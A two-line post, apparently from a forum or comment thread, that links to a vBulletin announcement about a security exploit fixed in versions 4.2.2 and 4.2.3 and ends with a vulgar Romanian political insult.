Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3

MUIE PONTA.